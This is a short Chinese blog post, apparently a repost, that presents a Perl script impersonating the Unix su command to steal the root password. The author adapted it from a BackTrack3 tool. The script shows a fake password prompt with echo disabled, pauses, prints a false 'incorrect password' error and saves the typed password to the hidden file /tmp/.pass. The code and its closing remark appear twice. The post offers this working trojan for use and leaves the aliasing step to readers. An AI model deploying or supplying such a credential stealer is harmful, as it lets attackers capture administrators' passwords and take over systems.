冒充su ,perl写的su.pl盗取root密码
- 作者: 似曾相识燕归来20795590
- 来源: 51数据库
- 2020-08-07
backtrack3里面/pentest/housekeeping里面有个超囧的偷root密码的东西,冒充su ,perl写的,管理员输入密码的时候还直接回显
我改了一下,把回显关了 加了个延时:
#!/usr/bin/perl
# Written by xi4oyu <evil.xi4oyu@gmail.com>.
print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);
很明显直接用是8行的,还有别名恢复等工作要做,各位看官自己搞定!
#!/usr/bin/perl
# Written by xi4oyu <evil.xi4oyu@gmail.com>.
print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);
很明显直接用是8行的,还有别名恢复等工作要做,各位看官自己搞定!
推荐阅读
